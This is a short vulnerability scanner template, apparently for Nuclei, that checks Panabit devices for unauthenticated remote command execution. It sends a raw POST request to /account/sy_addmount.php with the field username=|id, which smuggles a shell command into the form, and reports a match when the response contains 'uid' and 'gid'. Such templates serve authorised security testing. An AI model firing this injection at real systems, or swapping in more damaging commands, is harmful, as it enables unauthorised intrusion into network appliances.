id: Panabit-rce

info:
  name: Panabit 前台命令执行
  author: Str1am
  severity: high
  tags: Panabit,rce

requests:
  - raw:
      - |
        POST /account/sy_addmount.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
        
        username=|id
        

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "uid"
          - "gid"
        part: body
        condition: and